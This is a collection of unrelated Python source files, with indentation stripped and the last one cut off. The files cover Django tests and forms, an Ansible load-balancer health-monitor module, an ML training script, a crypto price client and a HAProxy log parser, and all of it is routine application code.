qsrps = RPSprepare.getlist('index')
self.assertTrue(qsrps[0].tradedate == d, 'tradedate save failed: {} {}'.format(qsrps[0].tradedate, d))
qsrps.delete()
# test that tradedate is saved correctly
d = (datetime.datetime.now() - datetime.timedelta(300)).date()
querysetlist = []
n = 10
for i in range(n):
rps = RPSprepare(code=qs[1], rps120=i + 1, rps250=1.2, tradedate=d + datetime.timedelta(i + 1))
querysetlist.append(rps)
RPSprepare.objects.bulk_create(querysetlist)
qsrps = RPSprepare.getlist('index')
for i in range(1, n, 1):
self.assertTrue(qsrps[i].tradedate == d + datetime.timedelta(i + 1),
'in database {} != {}'.format(qsrps[i].tradedate, d + datetime.timedelta(i + 1)))
self.assertTrue(qsrps[i].rps120 == 1 + i,
'in database {} != {}'.format(qsrps[i].rps120, i + 1))
@classmethod
def insertRandomRPSprepare(cls, listing=None, insertCount=1):
""" 随机插入insertCount个RPSprepare
listing为RPSprepare的外键,默认为空时,自动获取listing
:param listing: 对应RPSprepare的外键
:param insertCount: 自动插入的个数
:return: 插入成功的RPSprepare list
"""
if listing is None:
qslist = Listing.importIndexListing()
listing = qslist[random.randint(0, len(qslist) - 1)]
rpslist = []
beforday = insertCount * 2 + 1
d = (datetime.datetime.now() - datetime.timedelta(random.randint(1, beforday))).date()
for i in range(insertCount):
rps = RPSprepare(code=listing, rps120=1.1, rps250=1.2, tradedate=d)
rps.save()
rpslist.append(rps)
assert d == rps.tradedate, 'tradedate before/after save: {} : {}'.format(d, rps.tradedate)
d = d + datetime.timedelta(1)
return rpslist
def test_importIndexListing(self):
oldcount = RPSprepare.getlist('index').count()
# insert baseline index data for the test
qs = Listing.importIndexListing()
RPSprepare.importIndexListing()
count = RPSprepare.getlist('index').count()
self.assertTrue(count - oldcount > 500, '2018-05 index count should be greater than 500, {}'.format(count - oldcount))
print(RPSprepare.getlist('index')[0])
|
python
|
from amigocloud import AmigoCloud
# Use amigocloud version 1.0.5 or higher to login with tokens
# This will raise an AmigoCloudError if the token is invalid or has expired
ac = AmigoCloud(token='<token>')
query = ({
"author": "",
"extra": "",
"layer_name": "0",
"name": "My first baselayer",
"public_tiles": False,
"transparency": False,
"url": "<baselayer URL>",
"zoom_level_max": 20,
"zoom_level_min": 0
})
baselayer_url = '<AmigoCloud baselayer API URL>'
response = ac.post(url=baselayer_url, data=query, content_type="application/json")
print('Response:', response)
|
python
|
#!/usr/bin/env python3
from bank.user import User
from bank.account import Account
carter = User("Carter", 123, 1)
account = Account(123, 1000, "checking")
print("{} has account number {} with a pin number {}".format(carter.name, carter.account, carter.pin_number))
print("{} account with account number {} has balance {}".format(account.type, account.account_number, account.balance))
account.deposit(1000)
print(account.check_balance())
account.withdraw(500)
print(account.check_balance())
print("{} account with account number {} has balance {}".format(account.type, account.account_number, account.balance))
|
python
|
from setuptools import setup, find_packages
setup(
name='s3filesmanager',
version='0.5.3',
description='AWS S3 files manager',
#long_description=open('docs/index.rst').read(),
author='Jeffrey Hu',
author_email='[email protected]',
url='https://github.com/zhiwehu/s3filesmanager',
install_requires=['django >= 1.5',
'South >= 0.7.6',
'django-model-utils >= 1.1.0',
'django-bootstrap-toolkit',
'PIL == 1.1.7',
'sorl-thumbnail >= 11.12',
'boto >= 2.9.0',
'django-storages >= 1.1.8',
],
packages=find_packages(),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Framework :: Django',
],
include_package_data=True,
zip_safe=False,
)
|
python
|
import sys
sys.path.insert(0, "/work/ml_pipeline/regression_models/")
import regression_models
import numpy as np
from sklearn.model_selection import train_test_split
import pipeline
from processing.data_management import load_dataset, save_pipeline
from config import config
from regression_models import __version__ as _version
import logging
_logger = logging.getLogger(__name__)
def run_training() -> None:
"""Train the model."""
# read training data
data = load_dataset(file_name=config.TRAINING_DATA_FILE)
# divide train and test
X_train, X_test, y_train, y_test = train_test_split(
data[config.FEATURES], data[config.TARGET], test_size=0.1, random_state=0
) # we are setting the seed here
print("Complete Splitting data")
pipeline.lasso_pipe.fit(X_train, y_train)
pipeline.rf_pipe.fit(X_train, y_train)
_logger.info(f"saving model version: {_version}")
#Lasso
save_pipeline(pipeline_to_persist=pipeline.lasso_pipe, model_name= "lasso")
print(pipeline.lasso_pipe)
#random forest
save_pipeline(pipeline_to_persist=pipeline.rf_pipe, model_name = "random_forest")
if __name__ == "__main__":
run_training()
|
python
|
# Generated by Django 2.1.7 on 2019-03-06 19:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('project', '0005_auto_20190220_1112'),
]
operations = [
migrations.AlterField(
model_name='activeproject',
name='project_home_page',
field=models.URLField(blank=True, default=''),
),
migrations.AlterField(
model_name='activeproject',
name='version',
field=models.CharField(default='', max_length=15),
),
migrations.AlterField(
model_name='archivedproject',
name='project_home_page',
field=models.URLField(blank=True, default=''),
),
migrations.AlterField(
model_name='archivedproject',
name='version',
field=models.CharField(default='', max_length=15),
),
migrations.AlterField(
model_name='publishedproject',
name='project_home_page',
field=models.URLField(blank=True, default=''),
),
migrations.AlterField(
model_name='publishedproject',
name='version',
field=models.CharField(default='', max_length=15),
),
]
|
python
|
import numpy as np
from .vice import VICE
from .sac_classifier import SACClassifier
from softlearning.misc.utils import mixup
class VICEGoalConditioned(VICE):
def _timestep_before_hook(self, *args, **kwargs):
# TODO(hartikainen): implement goal setting, something like
# goal = self.pool.get_goal...
# self.env.set_goal(goal)
return super(VICEGoalConditioned, self)._timestep_before_hook(
*args, **kwargs)
def _get_classifier_feed_dict(self):
negatives = self.sampler.random_batch(
self._classifier_batch_size)['observations']
state_goal_size = negatives.shape[1]
assert state_goal_size % 2 == 0, (
"States and goals should be concatenated together,"
" so the total space has to be even.")
state_size = int(state_goal_size / 2)
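# positives pair each goal with itself (state == goal), giving the classifier
# examples in which the state has already reached the goal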
positives = np.concatenate((
negatives[:, state_size:],
negatives[:, state_size:]
), axis=1)
labels_batch = np.zeros(
(2 * self._classifier_batch_size, 2), dtype=np.int32)
labels_batch[:self._classifier_batch_size, 0] = 1
labels_batch[self._classifier_batch_size:, 1] = 1
observation_batch = np.concatenate([negatives, positives], axis=0)
if self._mixup_alpha > 0:
observation_batch, labels_batch = mixup(
observation_batch, labels_batch, alpha=self._mixup_alpha)
feed_dict = {
self._observations_ph: observation_batch,
self._label_ph: labels_batch
}
return feed_dict
def get_diagnostics(self,
iteration,
batch,
training_paths,
evaluation_paths):
# TODO(avi): figure out some classifier diagnostics that
# don't involve a pre-defined validation set
diagnostics = super(SACClassifier, self).get_diagnostics(
iteration, batch, training_paths, evaluation_paths)
return diagnostics
|
python
|
# (C) Copyright 2015 Hewlett Packard Enterprise Development LP
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import opstestfw
import pexpect
import re
def hostIperfServerStop(** kwargs):
"""
Library function to process information from traffic received using iperf.
:param deviceObj : Device object
:type deviceObj : object
:return: returnStruct Object
data: - Dictionary:
'Client IP': Client IP address
'Client port': Client port
'Server IP': Server IP address
'Server port': Server port
:returnType: object
"""
# Params
deviceObj = kwargs.get('deviceObj', None)
#Variable initialization
retBuffer = ''
# If device is not passed, we need error message
if deviceObj is None:
opstestfw.LogOutput('error', "Need to pass device to configure")
returnJson = opstestfw.returnStruct(returnCode=1)
return returnJson
deviceObj.expectHndl.expect(['# ', pexpect.TIMEOUT], timeout=1)
retBuffer = deviceObj.expectHndl.before
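# A typical iperf connection line the regex below is meant to match (illustrative):
# "local 10.1.1.1 port 5001 connected with 10.1.1.2 port 43210"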
ips_and_ports = re.search(
r'local (.*) port (\d+) connected with (.*) port (\d+)',
deviceObj.expectHndl.before)
traffic_data = re.findall(
r'sec ([.\d]+ .*?) ([.\d]+ .+)\r', deviceObj.expectHndl.before)
# If client fails result is None and returnList == []
server_ip = None
server_port = None
client_ip = None
client_port = None
if ips_and_ports is not None:
server_ip = ips_and_ports.group(1)
server_port = ips_and_ports.group(2)
client_ip = ips_and_ports.group(3)
client_port = ips_and_ports.group(4)
data_dict = {}
data_dict['Server IP'] = server_ip
data_dict['Server port'] = server_port
data_dict['Client IP'] = client_ip
data_dict['Client port'] = client_port
data_dict['Traffic data'] = traffic_data
command = '\003'
deviceObj.expectHndl.send(command)
deviceObj.expectHndl.expect('#')
retBuffer += deviceObj.expectHndl.before
# Compile information to return
returnCls = opstestfw.returnStruct(returnCode=0,
buffer=retBuffer,
data=data_dict)
return returnCls
|
python
|
from pybithumb.core import *
from pandas import DataFrame
import pandas as pd
import datetime
import math
class Bithumb:
@staticmethod
def _convert_unit(unit):
try:
unit = math.floor(unit * 10000) / 10000
return unit
except Exception:
return 0
@staticmethod
def get_tickers(payment_currency="KRW"):
"""
List of the cryptocurrencies supported by Bithumb
:param payment_currency : KRW
:return: list of tickers
"""
resp = None
try:
resp = PublicApi.ticker("ALL", payment_currency)
data = resp['data']
tickers = [k for k, v in data.items() if isinstance(v, dict)]
return tickers
except Exception:
return resp
@staticmethod
def get_current_price(order_currency, payment_currency="KRW"):
"""
Query the last traded price
:param order_currency : BTC/ETH/DASH/LTC/ETC/XRP/BCH/XMR/ZEC/QTUM/BTG/EOS/ICX/VEN/TRX/ELF/MITH/MCO/OMG/KNC
:param payment_currency : KRW
:return : price
"""
resp = None
try:
resp = PublicApi.ticker(order_currency, payment_currency)
if order_currency != "ALL":
return float(resp['data']['closing_price'])
else:
del resp["data"]['date']
return resp["data"]
except Exception:
return resp
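if __name__ == "__main__":
    # A minimal usage sketch, assuming network access to the Bithumb public API.
    print(Bithumb.get_tickers())
    print(Bithumb.get_current_price("BTC"))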
|
python
|
from django import forms
from django.forms.widgets import RadioSelect, CheckboxSelectMultiple
from django.forms import TypedChoiceField
from django.forms.models import inlineformset_factory
from django.utils.translation import ugettext_lazy as _
from keyform.models import Request, KeyData, Contact, KeyType
class CreateForm(forms.ModelForm):
class Meta:
model = Request
fields = ['building', 'student_name', 'bpn', 'reason_for_request', 'amt_received', 'payment_method', 'charge_amount', 'charged_on_rcr']
def __init__(self, *args, **kwargs):
super(CreateForm, self).__init__(*args, **kwargs)
# removes blank choices from Radio Select options
self.fields['payment_method'] = TypedChoiceField(widget=RadioSelect(), choices=Request.PAYMENT_TYPES, label=_("Paid by:"),
help_text=_("Cash/Check should only be accepted during camps and conferences, and also fill in the amount received. Use the Charge Amount box to charge to the student's account, or mark that the student was charged on the RCR if they are checking out."))
def clean(self):
cleaned_data = super(CreateForm, self).clean()
reason_for_request = cleaned_data.get("reason_for_request")
amt_received = cleaned_data.get("amt_received")
payment_method = cleaned_data.get("payment_method")
bpn = cleaned_data.get("bpn")
student_name = cleaned_data.get("student_name")
charge_amount = cleaned_data.get("charge_amount")
charged_on_rcr = cleaned_data.get("charged_on_rcr")
if reason_for_request == "lk":
if not bpn:
error_msg = _("Must have Bearpass Number when Lost/Stolen Key.")
self.add_error('bpn', error_msg)
if not student_name:
error_msg = _("Must have Student Name when Lost/Stolen Key.")
self.add_error('student_name', error_msg)
if amt_received <= 0 and charge_amount <= 0 and not charged_on_rcr:
error_msg = _("You must pick a billing method.")
self.add_error(None, error_msg)
error_msg = _("Choose one.")
self.add_error('amt_received', error_msg)
self.add_error('charge_amount', error_msg)
self.add_error('charged_on_rcr', error_msg)
if amt_received > 0 and payment_method == "na":
error_msg = _("If Amount Received is greater than zero, Payment Method must be selected.")
self.add_error('payment_method', error_msg)
if amt_received == 0 and payment_method != "na":
error_msg = _("If a Payment Method is selected, Amount Received cannot be zero.")
self.add_error('amt_received', error_msg)
return cleaned_data
class ContactForm(forms.ModelForm):
class Meta:
model = Contact
fields = ['name', 'email', 'buildings', 'alert_statuses']
widgets = {
'buildings': CheckboxSelectMultiple,
'alert_statuses': CheckboxSelectMultiple,
}
def clean_email(self):
email = self.cleaned_data.get('email')
return email.lower()
class EditForm(forms.ModelForm):
class Meta:
model = Request
fields = ['status']
class KeyDataForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(KeyDataForm, self).__init__(*args, **kwargs)
key_type_attrs = {
'data-pks_with_hide_core_number': ','.join([str(kt.pk) for kt in self.fields['key_type'].queryset if kt.hide_core_number]),
}
self.fields['key_type'].widget.attrs.update(key_type_attrs)
RequestFormSet = inlineformset_factory(Request, KeyData, form=KeyDataForm, extra=1, can_delete=False, exclude=[])
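# Hedged usage sketch: in a view this formset is typically bound to a Request
# instance, e.g. RequestFormSet(request.POST, instance=key_request), where
# key_request is a hypothetical Request object.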
|
python
|
#!/usr/bin/python
# module_check: supported
# Avi Version: 17.1.1
# Copyright 2021 VMware, Inc. All rights reserved. VMware Confidential
# SPDX-License-Identifier: Apache License 2.0
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_healthmonitor
author: Gaurav Rastogi (@grastogi23) <[email protected]>
short_description: Module for setup of HealthMonitor Avi RESTful Object
description:
- This module is used to configure HealthMonitor object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.3"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent", "present"]
type: str
avi_api_update_method:
description:
- Default method for object update is HTTP PUT.
- Setting to patch will override that behavior to use HTTP PATCH.
version_added: "2.5"
default: put
choices: ["put", "patch"]
type: str
avi_api_patch_op:
description:
- Patch operation to use when using avi_api_update_method as patch.
version_added: "2.5"
choices: ["add", "replace", "delete", "remove"]
type: str
avi_patch_path:
description:
- Patch path to use when using avi_api_update_method as patch.
type: str
avi_patch_value:
description:
- Patch value to use when using avi_api_update_method as patch.
type: str
allow_duplicate_monitors:
description:
- By default, multiple instances of the same healthmonitor to the same server are suppressed intelligently.
- In rare cases, the monitor may have specific constructs that go beyond the server keys (ip, port, etc.) during which such suppression is not
- desired.
- Use this knob to allow duplicates.
- Field introduced in 18.2.8.
- Allowed in basic(allowed values- true) edition, essentials(allowed values- true) edition, enterprise edition.
type: bool
authentication:
description:
- Authentication information for username/password.
- Field introduced in 20.1.1.
- Allowed in basic edition, essentials edition, enterprise edition.
type: dict
configpb_attributes:
description:
- Protobuf versioning for config pbs.
- Field introduced in 21.1.1.
type: dict
description:
description:
- User defined description for the object.
type: str
disable_quickstart:
description:
- During addition of a server or healthmonitors or during bootup, avi performs sequential health checks rather than waiting for send-interval to
- kick in, to mark the server up as soon as possible.
- This knob may be used to turn this feature off.
- Field introduced in 18.2.7.
- Allowed in basic(allowed values- false) edition, essentials(allowed values- false) edition, enterprise edition.
type: bool
dns_monitor:
description:
- Healthmonitordns settings for healthmonitor.
type: dict
external_monitor:
description:
- Healthmonitorexternal settings for healthmonitor.
type: dict
failed_checks:
description:
- Number of continuous failed health checks before the server is marked down.
- Allowed values are 1-50.
- Default value when not specified in API or module is interpreted by Avi Controller as 2.
type: int
http_monitor:
description:
- Healthmonitorhttp settings for healthmonitor.
type: dict
https_monitor:
description:
- Healthmonitorhttp settings for healthmonitor.
type: dict
imap_monitor:
description:
- Health monitor for imap.
- Field introduced in 21.1.1.
type: dict
imaps_monitor:
description:
- Health monitor for imaps.
- Field introduced in 21.1.1.
type: dict
is_federated:
description:
- This field describes the object's replication scope.
- If the field is set to false, then the object is visible within the controller-cluster and its associated service-engines.
- If the field is set to true, then the object is replicated across the federation.
- Field introduced in 17.1.3.
- Allowed in basic(allowed values- false) edition, essentials(allowed values- false) edition, enterprise edition.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
version_added: "2.4"
type: bool
markers:
description:
- List of labels to be used for granular rbac.
- Field introduced in 20.1.5.
- Allowed in basic edition, essentials edition, enterprise edition.
type: list
monitor_port:
description:
- Use this port instead of the port defined for the server in the pool.
- If the monitor succeeds to this port, the load balanced traffic will still be sent to the port of the server defined within the pool.
- Allowed values are 1-65535.
- Special values are 0 - 'use server port'.
type: int
name:
description:
- A user friendly name for this health monitor.
required: true
type: str
pop3_monitor:
description:
- Health monitor for pop3.
- Field introduced in 21.1.1.
type: dict
pop3s_monitor:
description:
- Health monitor for pop3s.
- Field introduced in 21.1.1.
type: dict
radius_monitor:
description:
- Health monitor for radius.
- Field introduced in 18.2.3.
- Allowed in basic edition, essentials edition, enterprise edition.
version_added: "2.9"
type: dict
receive_timeout:
description:
- A valid response from the server is expected within the receive timeout window.
- This timeout must be less than the send interval.
- If server status is regularly flapping up and down, consider increasing this value.
- Allowed values are 1-2400.
- Unit is sec.
- Default value when not specified in API or module is interpreted by Avi Controller as 4.
type: int
send_interval:
description:
- Frequency, in seconds, that monitors are sent to a server.
- Allowed values are 1-3600.
- Unit is sec.
- Default value when not specified in API or module is interpreted by Avi Controller as 10.
type: int
sip_monitor:
description:
- Health monitor for sip.
- Field introduced in 17.2.8, 18.1.3, 18.2.1.
- Allowed in basic edition, essentials edition, enterprise edition.
version_added: "2.9"
type: dict
smtp_monitor:
description:
- Health monitor for smtp.
- Field introduced in 21.1.1.
type: dict
smtps_monitor:
description:
- Health monitor for smtps.
- Field introduced in 21.1.1.
type: dict
successful_checks:
description:
- Number of continuous successful health checks before server is marked up.
- Allowed values are 1-50.
- Default value when not specified in API or module is interpreted by Avi Controller as 2.
type: int
tcp_monitor:
description:
- Healthmonitortcp settings for healthmonitor.
type: dict
tenant_ref:
description:
- It is a reference to an object of type tenant.
type: str
type:
description:
- Type of the health monitor.
- Enum options - HEALTH_MONITOR_PING, HEALTH_MONITOR_TCP, HEALTH_MONITOR_HTTP, HEALTH_MONITOR_HTTPS, HEALTH_MONITOR_EXTERNAL, HEALTH_MONITOR_UDP,
- HEALTH_MONITOR_DNS, HEALTH_MONITOR_GSLB, HEALTH_MONITOR_SIP, HEALTH_MONITOR_RADIUS, HEALTH_MONITOR_SMTP, HEALTH_MONITOR_SMTPS,
- HEALTH_MONITOR_POP3, HEALTH_MONITOR_POP3S, HEALTH_MONITOR_IMAP, HEALTH_MONITOR_IMAPS.
- Allowed in basic(allowed values- health_monitor_ping,health_monitor_tcp,health_monitor_udp,health_monitor_http,health_monitor_https) edition,
- essentials(allowed values- health_monitor_ping,health_monitor_tcp,health_monitor_udp) edition, enterprise edition.
required: true
type: str
udp_monitor:
description:
- Healthmonitorudp settings for healthmonitor.
type: dict
url:
description:
- Avi controller URL of the object.
type: str
uuid:
description:
- Uuid of the health monitor.
type: str
extends_documentation_fragment:
- avi
'''
EXAMPLES = """
- hosts: all
vars:
avi_credentials:
username: "admin"
password: "something"
controller: "192.168.15.18"
api_version: "21.1.1"
- name: Create a HTTPS health monitor
avi_healthmonitor:
avi_credentials: "{{ avi_credentials }}"
https_monitor:
http_request: HEAD / HTTP/1.0
http_response_code:
- HTTP_2XX
- HTTP_3XX
receive_timeout: 4
failed_checks: 3
send_interval: 10
successful_checks: 3
type: HEALTH_MONITOR_HTTPS
name: MyWebsite-HTTPS
"""
RETURN = '''
obj:
description: HealthMonitor (api/healthmonitor) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from avi.sdk.utils.ansible_utils import (
avi_ansible_api, avi_common_argument_spec)
HAS_AVI = True
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
state=dict(default='present',
choices=['absent', 'present']),
avi_api_update_method=dict(default='put',
choices=['put', 'patch']),
avi_api_patch_op=dict(choices=['add', 'replace', 'delete', 'remove']),
avi_patch_path=dict(type='str',),
avi_patch_value=dict(type='str',),
allow_duplicate_monitors=dict(type='bool',),
authentication=dict(type='dict',),
configpb_attributes=dict(type='dict',),
description=dict(type='str',),
disable_quickstart=dict(type='bool',),
dns_monitor=dict(type='dict',),
external_monitor=dict(type='dict',),
failed_checks=dict(type='int',),
http_monitor=dict(type='dict',),
https_monitor=dict(type='dict',),
imap_monitor=dict(type='dict',),
imaps_monitor=dict(type='dict',),
is_federated=dict(type='bool',),
markers=dict(type='list',),
monitor_port=dict(type='int',),
name=dict(type='str', required=True),
pop3_monitor=dict(type='dict',),
pop3s_monitor=dict(type='dict',),
radius_monitor=dict(type='dict',),
receive_timeout=dict(type='int',),
send_interval=dict(type='int',),
sip_monitor=dict(type='dict',),
smtp_monitor=dict(type='dict',),
smtps_monitor=dict(type='dict',),
successful_checks=dict(type='int',),
tcp_monitor=dict(type='dict',),
tenant_ref=dict(type='str',),
type=dict(type='str', required=True),
udp_monitor=dict(type='dict',),
url=dict(type='str',),
uuid=dict(type='str',),
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(
argument_spec=argument_specs, supports_check_mode=True)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=17.1) or requests is not installed. '
'For more details visit https://github.com/vmware/alb-sdk.'))
return avi_ansible_api(module, 'healthmonitor',
set())
if __name__ == '__main__':
main()
|
python
|
from .api import NasapiError, Nasapi #noqa
|
python
|
import sys
from people_flow import YOLO
from people_flow import detect_video
if __name__ == '__main__':
video_path = 'test1.MP4'
output_path='human_counter-master'
detect_video(YOLO(), video_path, output_path)
print('sun')
|
python
|
from .routes import Tesseract_OCR_BLUEPRINT
from .routes import Tesseract_OCR_BLUEPRINT_WF
#from .documentstructure import DOCUMENTSTRUCTURE_BLUEPRINT
|
python
|
# Copyright 2009-2013 Eucalyptus Systems, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 3 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
# Please contact Eucalyptus Systems, Inc., 6755 Hollister Ave., Goleta
# CA 93117, USA or visit http://www.eucalyptus.com/licenses/ if you need
# additional information or have any questions.
import servo
from datetime import datetime as dt
class HaproxyLog(object):
def __init__(self):
self.timestamp = None #timestamp
self.elb = None #name of the loadbalancer
self.client_ip = None
self.client_port = None
self.backend_ip = None
self.backend_port = None
self.received_bytes = None
self.sent_bytes = None
def get_latency(self): # in milliseconds
raise NotImplementedError()
def get_request_count(self):
raise NotImplementedError()
def get_status_code(self):
raise NotImplementedError()
def is_backend_code(self):
raise NotImplementedError()
class HttpLog(HaproxyLog):
def __init__(self, frontend_name=None, backend_name=None, server_name=None, status_code=200, term_state='--', Tq=0, Tw=0, Tc=0, Tr=0, Tt=0):
self.frontend_name = frontend_name
self.backend_name = backend_name
self.server_name = server_name
self.status_code = status_code
self.term_state = term_state
self.Tq = Tq #the total time in milliseconds spent waiting for the client to send a full HTTP request
self.Tw = Tw #total time in milliseconds spent waiting in the various queues.
self.Tc = Tc #total time in milliseconds spent waiting for the connection to establish to the final server, including retries
self.Tr = Tr #total time in milliseconds spent waiting for the server to send a full HTTP response
self.Tt = Tt # total time in milliseconds elapsed between the accept and the last close
def get_latency(self):
return self.Tr
def get_request_count(self):
return 1
def get_status_code(self):
return int(self.status_code)
def is_backend_code(self):
# TODO: SPARK: more sophisticated logic to classify the termination state would be needed.
# Any session whose termination state is not '--' indicates that haproxy detected an error
# with the session and sent the HTTP status code to the client accordingly.
if self.term_state == '--':
return True
else:
return False
@staticmethod
def parse(line):
# self.__content_map[section_name].append('logformat httplog\ %f\ %b\ %s\ %ST\ %ts\ %Tq\ %Tw\ %Tc\ %Tr\ %Tt')
token = line.split(' ')
if len(token) == 11:
log = HttpLog()
log.frontend_name = token[1]
log.backend_name = token[2]
log.server_name = token[3]
log.status_code = int(token[4])
log.term_state = token[5]
log.Tq = int(token[6])
log.Tw = int(token[7])
log.Tc = int(token[8])
log.Tr = int(token[9])
log.Tt = int(token[10])
return log
raise Exception()
@staticmethod
def log_format():
return 'httplog\ %f\ %b\ %s\ %ST\ %ts\ %Tq\ %Tw\ %Tc\ %Tr\ %Tt'
def __str__(self):
return 'httplog-%s-%s-%s-%d-%s-%d-%d-%d-%d-%d' % (self.frontend_name, self.backend_name, self.server_name, self.status_code, self.term_state, self.Tq, self.Tw, self.Tc, self.Tr, self.Tt)
def __repr__(self):
return self.__str__()
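# Hedged example of the 11-token line produced by log_format(); the names and
# timings below are illustrative assumptions:
# HttpLog.parse('httplog http-in servers web01 200 -- 2 0 1 15 20')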
class HttpAccessLog (HttpLog):
def __init__(self, loadbalancer=None):
self.elb = loadbalancer
self.elb_status_code = 200
self.backend_status_code = -1
self.http_request = None
self.user_agent = None
# getters compute ELB-specific time metrics using the Haproxy metrics
def request_processing_time(self):
try:
return '%.6f' % ((self.Tw + self.Tc)/1000.0)
        except Exception:
            return '-1'
def backend_processing_time(self):
try:
return '%.6f' % (self.Tr/1000.0)
        except Exception:
            return '-1'
def response_processing_time(self):
return '-1'
def request_str(self):
return self.http_request
def iso_timestamp(self):
logt = dt.utcfromtimestamp(float(self.timestamp))
return logt.isoformat()
def access_log(self):
        # timestamp elb client:port backend:port request_processing_time backend_processing_time response_processing_time elb_status_code backend_status_code received_bytes sent_bytes request user_agent
return '%s %s %s:%s %s:%s %s %s %s %d %d %d %d \"%s\" \"%s\"' % (self.iso_timestamp(), self.elb, self.client_ip, self.client_port, self.backend_ip, self.backend_port, self.request_processing_time(), self.backend_processing_time(), self.response_processing_time(), self.elb_status_code, self.backend_status_code, self.received_bytes, self.sent_bytes, self.request_str(),self.user_agent)
@staticmethod
def log_format():
return 'httplog\ %Ts\ %ci\ %cp\ %si\ %sp\ %Tq\ %Tw\ %Tc\ %Tr\ %Tt\ %ST\ %U\ %B\ %f\ %b\ %s\ %ts\ %r\ %hrl'
@staticmethod
def parse(line, loadbalancer=None):
token = line.split(' ')
if len(token) >= len(HttpAccessLog.log_format().split(' ')):
log = HttpAccessLog(loadbalancer)
log.timestamp = token[1]
log.client_ip = token[2]
log.client_port = token[3]
log.backend_ip = token[4]
log.backend_port = token[5]
log.Tq = int(token[6])
log.Tw = int(token[7])
log.Tc = int(token[8])
log.Tr = int(token[9])
log.Tt = int(token[10])
log.elb_status_code = int(token[11])
log.status_code = log.elb_status_code
log.received_bytes = int(token[12])
log.sent_bytes = int(token[13])
log.frontend_name = token[14]
log.backend_name = token[15]
log.server_name = token[16]
log.term_state = token[17]
log.http_request = ' '.join(token[18:21]) # 3 tuple HTTP request
log.user_agent = ' '.join(token[21:]) # Rest of line
return log
raise Exception('line: %s, # tokens: %d' % (line, len(token)))
class TcpLog(HaproxyLog):
def __init__(self, frontend_name=None, backend_name=None, server_name=None, term_state='--', Tw=0, Tc=0, Tt=0):
self.frontend_name = frontend_name
self.backend_name = backend_name
self.server_name = server_name
self.term_state = term_state
self.Tw = Tw #total time in milliseconds spent waiting in the various queues.
self.Tc = Tc #total time in milliseconds spent waiting for the connection to establish to the final server, including retries
self.Tt = Tt # total time in milliseconds elapsed between the accept and the last close
def get_latency(self): # in milliseconds
return self.Tt
def get_request_count(self):
return 1
def get_status_code(self):
return 0 # irrelevant
def is_backend_code(self):
return True #irrelevant
@staticmethod
def parse(line):
# self.__content_map[section_name].append('log-format tcplog\ %f\ %b\ %s\ %ts\ %Tw\ %Tc\ %Tt')
token = line.split(' ')
if len(token) == 8:
log = TcpLog()
log.frontend_name = token[1]
log.backend_name = token[2]
log.server_name = token[3]
log.term_state = token[4]
log.Tw = int(token[5])
log.Tc = int(token[6])
log.Tt = int(token[7])
return log
        raise Exception('malformed tcplog line: %s' % line)
@staticmethod
def log_format():
return 'tcplog\ %f\ %b\ %s\ %ts\ %Tw\ %Tc\ %Tt'
def __str__(self):
return 'tcplog-%s-%s-%s-%s-%d-%d-%d' % (self.frontend_name, self.backend_name, self.server_name, self.term_state, self.Tw, self.Tc, self.Tt)
def __repr__(self):
        return self.__str__()
class TcpAccessLog(TcpLog):
def __init__(self, loadbalancer=None):
self.elb = loadbalancer
self.elb_status_code = -1
self.backend_status_code = -1
self.http_request = 'NA'
def request_processing_time(self):
try:
return '%.6f' % ((self.Tw + self.Tc)/1000.0)
        except Exception:
            return '-1'
def backend_processing_time(self):
return '-1'
def response_processing_time(self):
return '-1'
def iso_timestamp(self):
logt = dt.utcfromtimestamp(float(self.timestamp))
return logt.isoformat()
def access_log(self):
# timestamp elb client:port backend:port request_processing_time backend_processing_time response_processing_time elb_status_code backend_status_code received_bytes sent_bytes request
return '%s %s %s:%s %s:%s %s %s %s %d %d %d %d' % (self.iso_timestamp(), self.elb, self.client_ip, self.client_port, self.backend_ip, self.backend_port, self.request_processing_time(), self.backend_processing_time(), self.response_processing_time(), self.elb_status_code, self.backend_status_code, self.received_bytes, self.sent_bytes)
@staticmethod
def log_format():
return 'tcplog\ %Ts\ %ci\ %cp\ %si\ %sp\ %Tw\ %Tc\ %Tt\ %U\ %B\ %f\ %b\ %s\ %ts'
@staticmethod
def parse(line, loadbalancer=None):
token = line.split(' ')
if len(token) == len(TcpAccessLog.log_format().split(' ')):
log = TcpAccessLog(loadbalancer)
log.timestamp = token[1]
log.client_ip = token[2]
log.client_port = token[3]
log.backend_ip = token[4]
log.backend_port = token[5]
log.Tw = int(token[6])
log.Tc = int(token[7])
log.Tt = int(token[8])
log.received_bytes = int(token[9])
log.sent_bytes = int(token[10])
log.frontend_name = token[11]
log.backend_name = token[12]
log.server_name = token[13]
log.term_state = token[14]
return log
raise Exception('line: %s, # tokens: %d' % (line, len(token)))
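# Minimal usage sketch (added for illustration; the sample line below is an
# assumption that matches HttpLog.log_format(), not real traffic):
if __name__ == '__main__':
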